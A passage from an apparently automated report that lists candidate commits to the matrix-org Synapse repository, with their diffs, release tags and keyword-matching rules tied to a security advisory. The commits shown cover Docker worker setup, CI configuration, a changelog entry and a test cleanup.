sometimes inconsistent matrix-org/sliding-sync#189" + }, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 73", + "relevance": 2 + } + ] + }, + { + "commit_id": "422d40e82f6b0de224922f057e8f6f83d479291d", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607970898, + "hunks": 8, + "message": "major wip", + "diff": [ + "diff --git a/docker/Dockerfile-workers b/docker/Dockerfile-workers", + "new file mode 100644", + "index 000000000..88b2a5262", + "--- /dev/null", + "+++ b/docker/Dockerfile-workers", + "@@ -0,0 +1,25 @@", + "+# Inherit from the official Synapse docker image", + "+FROM matrixdotorg/synapse", + "+", + "+# Install deps", + "+RUN apt-get update", + "+RUN apt-get install -y supervisor redis nginx", + "+", + "+# A script to read environment variables and create the necessary", + "+# files to run the desired worker configuration", + "+COPY ./docker/create_worker_config_files.py /create_worker_config_files.py", + "+RUN /create_worker_config_files.py", + "+", + "+# Create a volume for logging. The official Synapse docker image", + "+# only logs to console, however this is inconvenient for multi-process", + "+# containers.", + "+VOLUME [\"/logs\"]", + "+", + "+# Expose Synapse client, ACME challenge and federation ports", + "+EXPOSE 8008/tcp 8009/tcp 8448/tcp", + "+", + "+# Start supervisord", + "+COPY ./docker/worker_conf/supervisord.conf /etc/supervisor/conf.d/supervisord.conf", + "+ENTRYPOINT [\"/usr/bin/supervisord\"]", + "+", + "+# TODO: Healthcheck? Can we ask supervisord?", + "\\ No newline at end of file", + "diff --git a/docker/MoveToComplement.Dockerfile b/docker/MoveToComplement.Dockerfile", + "new file mode 100644", + "index 000000000..c91000bc7", + "--- /dev/null", + "+++ b/docker/MoveToComplement.Dockerfile", + "@@ -0,0 +1,35 @@", + "+# This dockerfile builds on top of Dockerfile-worker and includes a built-in postgres instance.", + "+# It is intended to be used for Complement testing", + "+", + "+FROM matrixdotorg/synapse:workers", + "+", + "+# Install postgres", + "+RUN apt-get update", + "+RUN apt-get install -y postgres", + "+", + "+# Create required databases in postgres", + "+", + "+# Create a user without a password", + "+RUN sudo -u postgres createuser -w synapse_user", + "+", + "+# Then set their password", + "+RUN sudo -u postgres psql -c \"ALTER USER postgres PASSWORD 'somesecret';\"", + "+", + "+# Create the synapse database", + "+RUN sudo -u postgres psql -c \"CREATE DATABASE synapse \\", + "+ ENCODING 'UTF8' \\", + "+ LC_COLLATE='C' \\", + "+ LC_CTYPE='C' \\", + "+ template=template0 \\", + "+ OWNER synapse_user;\"", + "+", + "+# Modify Synapse's database config to point to the local postgres", + "+COPY ./docker/synapse_use_local_postgres.py /synapse_use_local_postgres.py", + "+RUN /synapse_use_local_postgres.py", + "+", + "+VOLUME [\"/data\"]", + "+", + "+EXPOSE 8008/tcp 8009/tcp 8448/tcp", + "+", + "+# Start supervisord", + "+CMD [\"/usr/bin/supervisord\"]", + "\\ No newline at end of file", + "diff --git a/docker/conf/homeserver.yaml b/docker/conf/homeserver.yaml", + "index a808485c1..8434fc69f 100644", + "--- a/docker/conf/homeserver.yaml", + "+++ b/docker/conf/homeserver.yaml", + "@@ -29,4 +29,3 @@ listeners:", + " {% if not SYNAPSE_NO_TLS %}", + "- -", + "- port: 8448", + "+ - port: 8448", + " bind_addresses: ['::']", + "@@ -54,2 +53,11 @@ listeners:", + "+ {% if SYNAPSE_WORKERS %}", + "+ # The HTTP replication port", + "+ - port: 9093", + "+ bind_address: '127.0.0.1'", + "+ type: http", + "+ resources:", + "+ - names: [replication]", + "+ {% endif %}", + "+", + " ## Database ##", + "diff --git a/docker/generate_shared_worker_config.py b/docker/generate_shared_worker_config.py", + "new file mode 100644", + "index 000000000..755a73734", + "--- /dev/null", + "+++ b/docker/generate_shared_worker_config.py", + "@@ -0,0 +1,145 @@", + "+#!/usr/bin/env python", + "+# -*- coding: utf-8 -*-", + "+# Copyright 2020 The Matrix.org Foundation C.I.C.", + "+#", + "+# Licensed under the Apache License, Version 2.0 (the \"License\");", + "+# you may not use this file except in compliance with the License.", + "+# You may obtain a copy of the License at", + "+#", + "+# http://www.apache.org/licenses/LICENSE-2.0", + "+#", + "+# Unless required by applicable law or agreed to in writing, software", + "+# distributed under the License is distributed on an \"AS IS\" BASIS,", + "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+# See the License for the specific language governing permissions and", + "+# limitations under the License.", + "+", + "+# This script reads environment variables and generates a shared Synapse worker,", + "+# nginx and supervisord configs depending on the workers requested", + "+", + "+import os", + "+import sys", + "+", + "+", + "+def main(args, environ):", + "+ \"\"\"Read the desired list of workers from environment variables and generate", + "+ shared homeserver, nginx and supervisord configs.", + "+", + "+ Args:", + "+ environ: _Environ[str]", + "+ \"\"\"", + "+ # The contents of this string will be appended to the one generated by", + "+ # the homeserver, and is intended mainly for disabling functionality on the main", + "+ # when certain workers are spun up", + "+ homeserver_config = \"\"", + "+", + "+ # The contents of this string will be append to the base supervisord config", + "+ supervisord_config = \"\"", + "+", + "+ # An nginx site config. Will live in /etc/nginx/conf.d", + "+ nginx_config_template_header = \"\"\"", + "+ server {", + "+ listen 80;", + "+ listen [::]:80;", + "+", + "+ # For the federation port", + "+ listen 8448 default_server;", + "+ listen [::]:8448 default_server;", + "+", + "+ server_name localhost;", + "+ \"\"\"", + "+ nginx_config_body = \"\"", + "+ nginx_config_template_end = \"\"\"", + "+ # Send all other traffic to the main process", + "+ location ~* ^(\\/_matrix|\\/_synapse) {", + "+ proxy_pass http://localhost:8008;", + "+ proxy_set_header X-Forwarded-For $remote_addr;", + "+", + "+ # TODO: Can we move this to the default nginx.conf so all locations are", + "+ # affected?", + "+ #", + "+ # Nginx by default only allows file uploads up to 1M in size", + "+ # Increase client_max_body_size to match max_upload_size defined in homeserver.yaml", + "+ client_max_body_size 50M;", + "+ }", + "+ }", + "+ \"\"\"", + "+", + "+ # Read desired worker configuration from environment", + "+ worker_types = environ.get(\"SYNAPSE_WORKERS\")", + "+ worker_types = worker_types.split(\",\")", + "+", + "+ for worker_type in worker_types:", + "+ if worker_type == \"pusher\":", + "+ # Disable push handling from the main process", + "+ homeserver_config += \"\"\"", + "+ start_pushers: false", + "+ \"\"\"", + "+", + "+ # Enable the pusher worker in supervisord", + "+ supervisord_config += \"\"\"", + "+ \"\"\"", + "+", + "+ # This worker does not handle any REST endpoints", + "+", + "+ elif worker_type == \"appservice\":", + "+ # Disable appservice traffic sending from the main process", + "+ homeserver_config += \"\"\"", + "+ notify_appservices: false", + "+ \"\"\"", + "+", + "+ # Enable the pusher worker in supervisord", + "+ supervisord_config += \"\"\"", + "+ [program:synapse_user_dir]", + "+ command=/usr/local/bin/python -m synapse.app.user_dir \\", + "+ --config-path=/config/homeserver.yaml \\", + "+ --config-path=/config/workers/user_dir.yaml", + "+ autorestart=unexpected", + "+ exitcodes=0", + "+ \"\"\"", + "+", + "+ # This worker does not handle any REST endpoints", + "+", + "+ elif worker_type == \"user_dir\":", + "+ # Disable user directory updates on the main process", + "+ homeserver_config += \"\"\"", + "+ update_user_directory: false", + "+ \"\"\"", + "+", + "+ # Enable the user directory worker in supervisord", + "+ supervisord_config += \"\"\"", + "+ [program:synapse_user_dir]", + "+ command=/usr/local/bin/python -m synapse.app.user_dir \\", + "+ --config-path=/config/homeserver.yaml \\", + "+ --config-path=/config/workers/user_dir.yaml", + "+ autorestart=unexpected", + "+ exitcodes=0", + "+ \"\"\"", + "+", + "+ # Route user directory requests to this worker", + "+ nginx_config_body += \"\"\"", + "+ location ~* ^/_matrix/client/(api/v1|r0|unstable)/user_directory/search$ {", + "+ proxy_pass http://localhost:8010;", + "+ proxy_set_header X-Forwarded-For $remote_addr;", + "+ }", + "+ \"\"\"", + "+", + "+ # Write out the config files", + "+", + "+ # Main homeserver config", + "+ with open(\"/config/main.yaml\", \"a\") as f:", + "+ f.write(homeserver_config)", + "+", + "+ # Nginx config", + "+ with open(\"/config/nginx.conf\", \"w\") as f:", + "+ f.write(nginx_config_template_header)", + "+ f.write(nginx_config_body)", + "+ f.write(nginx_config_template_end)", + "+", + "+ # Supervisord config", + "+ with open(\"/config/supervisord.conf\", \"a\") as f:", + "+ f.write(supervisord_config)", + "+", + "+", + "+if __name__ == \"__main__\":", + "+ main(sys.argv, os.environ)", + "diff --git a/docker/start.py b/docker/start.py", + "index 0d2c590b8..c3a6d9686 100755", + "--- a/docker/start.py", + "+++ b/docker/start.py", + "@@ -179,3 +179,2 @@ def run_generate_config(environ, ownership):", + "-", + " def main(args, environ):", + "diff --git a/docker/worker_conf/main.conf b/docker/worker_conf/main.conf", + "new file mode 100644", + "index 000000000..917b82500", + "--- /dev/null", + "+++ b/docker/worker_conf/main.conf", + "@@ -0,0 +1,9 @@", + "+# A bit of Synapse config file that will be appended to the main homeserver config file.", + "+# It is intended for generate_shared_worker_config.py to add entries to this file to", + "+# disable functionality as equivalent workers are spun up.", + "+", + "+# TODO: extend the existing `listeners` section. This defines the ports that the", + "+# main process will listen on.", + "+", + "+redis:", + "+ enabled: true", + "diff --git a/docker/worker_conf/supervisord.conf b/docker/worker_conf/supervisord.conf", + "new file mode 100644", + "index 000000000..63c898e75", + "--- /dev/null", + "+++ b/docker/worker_conf/supervisord.conf", + "@@ -0,0 +1,19 @@", + "+[supervisord]", + "+nodaemon=true", + "+", + "+[program:nginx]", + "+command=/usr/sbin/nginx -g \"daemon off;\"", + "+priority=900", + "+stdout_logfile= /dev/stdout", + "+stdout_logfile_maxbytes=0", + "+stderr_logfile=/dev/stderr", + "+stderr_logfile_maxbytes=0", + "+username=www-data", + "+autorestart=true", + "+", + "+[program:synapse_main]", + "+command=/usr/local/bin/python -m synapse.app.homeserver \\", + "+ --config-path=/config/homeserver.yaml \\", + "+ --config-path=/config/main.yaml", + "+autorestart=unexpected", + "+exitcodes=0" + ], + "changed_files": [ + "docker/Dockerfile-workers", + "docker/MoveToComplement.Dockerfile", + "docker/conf/homeserver.yaml", + "docker/generate_shared_worker_config.py", + "docker/start.py", + "docker/worker_conf/main.conf", + "docker/worker_conf/supervisord.conf" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: homeserver, server, file", + "relevance": 4 + } + ] + }, + { + "commit_id": "35be2600902189392aaa6a212058853e9e39aeba", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608206718, + "hunks": 1, + "message": "Newsfile", + "diff": [ + "diff --git a/changelog.d/8962.bugfix b/changelog.d/8962.bugfix", + "new file mode 100644", + "index 000000000..af1a5e4c3", + "--- /dev/null", + "+++ b/changelog.d/8962.bugfix", + "@@ -0,0 +1 @@", + "+Fix bug where application services couldn't register new ghost users if the server had reached its MAU limit." + ], + "changed_files": [ + "changelog.d/8962.bugfix" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + } + ] + }, + { + "commit_id": "57068eae75162f6cf0e3be05a87de6c22d90b6c7", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607521696, + "hunks": 1, + "message": "Add 'xmlsec1' to dependency list", + "diff": [ + "diff --git a/docker/Dockerfile-dhvirtualenv b/docker/Dockerfile-dhvirtualenv", + "index 619585d5f..2b7f01f7f 100644", + "--- a/docker/Dockerfile-dhvirtualenv", + "+++ b/docker/Dockerfile-dhvirtualenv", + "@@ -71,3 +71,4 @@ RUN apt-get update -qq -o Acquire::Languages=none \\", + " sqlite3 \\", + "- libpq-dev", + "+ libpq-dev \\", + "+ xmlsec1" + ], + "changed_files": [ + "docker/Dockerfile-dhvirtualenv" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: file", + "relevance": 4 + } + ] + }, + { + "commit_id": "9bbbb11ac20896629c25b160fa3cebef29431bfe", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607528919, + "hunks": 5, + "message": "Pin the docker version for multiarch builds It seems that letting CircleCI use its default docker version (17.09.0-ce, apparently) did not interact well with multiarch builds: in particular, we saw weird effects where running an amd64 build at the same time as an arm64 build caused the arm64 builds to fail with: Error while loading /usr/sbin/dpkg-deb: No such file or directory", + "diff": [ + "diff --git a/.circleci/config.yml b/.circleci/config.yml", + "index b10cbedd6..088da5573 100644", + "--- a/.circleci/config.yml", + "+++ b/.circleci/config.yml", + "@@ -7,3 +7,2 @@ jobs:", + " - checkout", + "- - setup_remote_docker", + " - docker_prepare", + "@@ -22,3 +21,2 @@ jobs:", + " - checkout", + "- - setup_remote_docker", + " - docker_prepare", + "@@ -48,3 +46,3 @@ commands:", + " docker_prepare:", + "- description: Downloads the buildx cli plugin and enables multiarch images", + "+ description: Sets up a remote docker server, downloads the buildx cli plugin, and enables multiarch images", + " parameters:", + "@@ -54,2 +52,6 @@ commands:", + " steps:", + "+ - setup_remote_docker:", + "+ # 19.03.13 was the most recent available on circleci at the time of", + "+ # writing.", + "+ version: 19.03.13", + " - run: apk add --no-cache curl", + "diff --git a/changelog.d/8906.misc b/changelog.d/8906.misc", + "new file mode 100644", + "index 000000000..8b95e4c55", + "--- /dev/null", + "+++ b/changelog.d/8906.misc", + "@@ -0,0 +1 @@", + "+Fix multiarch docker image builds." + ], + "changed_files": [ + ".circleci/config.yml", + "changelog.d/8906.misc" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: version, file", + "relevance": 4 + } + ] + }, + { + "commit_id": "ac2acf1524ea33a37b5cdbd4cebcb149c80a48c7", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608045483, + "hunks": 3, + "message": "Remove redundant reading of SynapseRequest.args this didn't seem to be doing a lot, so remove it.", + "diff": [ + "diff --git a/tests/rest/client/v2_alpha/test_account.py b/tests/rest/client/v2_alpha/test_account.py", + "index 11a042f9e..8a898be24 100644", + "--- a/tests/rest/client/v2_alpha/test_account.py", + "+++ b/tests/rest/client/v2_alpha/test_account.py", + "@@ -21,3 +21,2 @@ from email.parser import Parser", + " from typing import Optional", + "-from urllib.parse import urlencode", + "@@ -270,9 +269,2 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", + "- # Send arguments as url-encoded form data, matching the template's behaviour", + "- form_args = []", + "- for key, value_list in request.args.items():", + "- for value in value_list:", + "- arg = (key, value)", + "- form_args.append(arg)", + "-", + " # Confirm the password reset", + "@@ -283,3 +275,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", + " path,", + "- content=urlencode(form_args).encode(\"utf8\"),", + "+ content=b\"\",", + " 